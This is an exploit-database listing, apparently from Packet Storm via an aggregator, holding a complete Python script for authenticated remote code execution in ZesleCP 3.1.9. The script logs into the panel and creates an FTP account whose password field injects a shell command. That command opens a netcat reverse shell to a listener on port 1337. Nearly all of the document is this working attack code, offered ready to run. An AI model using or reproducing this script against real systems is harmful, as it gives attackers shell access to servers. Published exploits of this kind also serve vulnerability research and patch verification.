Exploit for ZesleCP 3.1.9 Remote Code Execution

Name: Exploit for ZesleCP 3.1.9 Remote Code Execution
Rating: 5 (95 reviews)
2021-08-27 | CVSS 0.0
## https://sploitus.com/exploit?id=PACKETSTORM:163920
# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)  
# Date: 27.08.2021  
# Author: Numan Türle  
# Vendor Homepage: https://zeslecp.com/  
# Software Link: https://zeslecp.com/  
# Version: <=3.1.9  
# https://www.youtube.com/watch?v=5lTDTEBVq-0  
  
#!/usr/bin/python3  
# -*- coding: utf-8 -*-  
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )  
# author: twitter.com/numanturle  
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD  
# https://www.youtube.com/watch?v=5lTDTEBVq-0  
  
  
import argparse,requests,warnings,json,random,string  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from cmd import Cmd  
  
warnings.simplefilter('ignore',InsecureRequestWarning)  
  
def init():  
parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')  
parser.add_argument('-u','--host',help='Host', type=str, required=True)  
parser.add_argument('-l', '--login',help='Username', type=str, required=True)  
parser.add_argument('-p', '--password',help='Password', type=str, required=True)  
args = parser.parse_args()  
exploit(args)  
  
def exploit(args):  
  
listen_ip = "0.0.0.0"  
listen_port = 1337  
  
session = requests.Session()  
target = "https://{}:2087".format(args.host)  
username = args.login  
password = args.password  
  
print("[+] Target {}".format(target))  
  
login = session.post(target+"/login", verify=False, json={"username":username,"password":password})  
login_json = json.loads(login.content)  
  
if login_json["success"]:  
session_hand_login = session.cookies.get_dict()  
  
print("[+] Login successfully")  
print("[+] Creating ftp account")  
  
ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))  
  
print("[+] Username : {}".format(ftp_username))  
  
print("[+] Send payload....")  
  
payload = {  
"ftp_user": ftp_username,  
"ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)  
}  
  
try:  
feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3)  
except requests.exceptions.ReadTimeout:   
pass  
  
print("[+] Successful")  
else:  
print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))  
  
if __name__ == "__main__":  
init()